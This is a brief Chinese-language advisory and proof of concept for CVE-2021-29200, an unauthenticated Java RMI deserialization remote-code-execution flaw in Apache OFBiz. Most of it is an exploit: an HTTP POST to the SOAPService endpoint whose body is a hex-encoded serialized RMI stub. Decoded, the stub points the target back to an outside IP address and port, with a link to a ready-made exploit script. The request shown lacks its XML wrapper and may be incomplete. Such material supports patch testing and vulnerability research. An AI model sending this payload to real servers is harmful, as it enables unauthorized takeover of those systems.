Apache OFBiz RMI Bypass RCE（CVE-2021-29200）

# Apache OFBiz RMI Bypass RCE（CVE-2021-29200）

由于Apache OFBiz存在Java RMI反序列化漏洞，未经身份验证的用户可以执行RCE攻击，导致服务器被接管。

影响版本：
Apache OFBiz < 17.12.07 详细分析可以见：https://mp.weixin.qq.com/s/vM0pXZ5mhusFBsj1xD-2zw poc： ``` POST /webtools/control/SOAPService HTTP/1.1 Host: xxx User-Agent: python-requests/2.24.0 Accept-Encoding: gzip, deflate Accept: */* Connection: close Content-Type: text/xml Content-Length: 877



ACED0005737200326A617661782E6D616E6167656D656E742E72656D6F74652E726D692E524D49436F6E6E656374696F6E496D706C5F5374756200000000000000020200007872001A6A6176612E726D692E7365727665722E52656D6F746553747562ECC98BE1651A0200007872001C6A6176612E726D692E7365727665722E52656D6F74654F626A656374D361B4910C61331E03000078707738000A556E6963617374526566000F3130342E3135362E3233312E3135300000270FFFFFFFFFEF34D1DB00000000000000000000000000000078




“`

poc.py：https://github.com/r0ckysec/CVE-2021-29200

ref:

* https://github.com/r0ckysec/CVE-2021-29200
* https://mp.weixin.qq.com/s/vM0pXZ5mhusFBsj1xD-2zw
* https://xz.aliyun.com/t/9556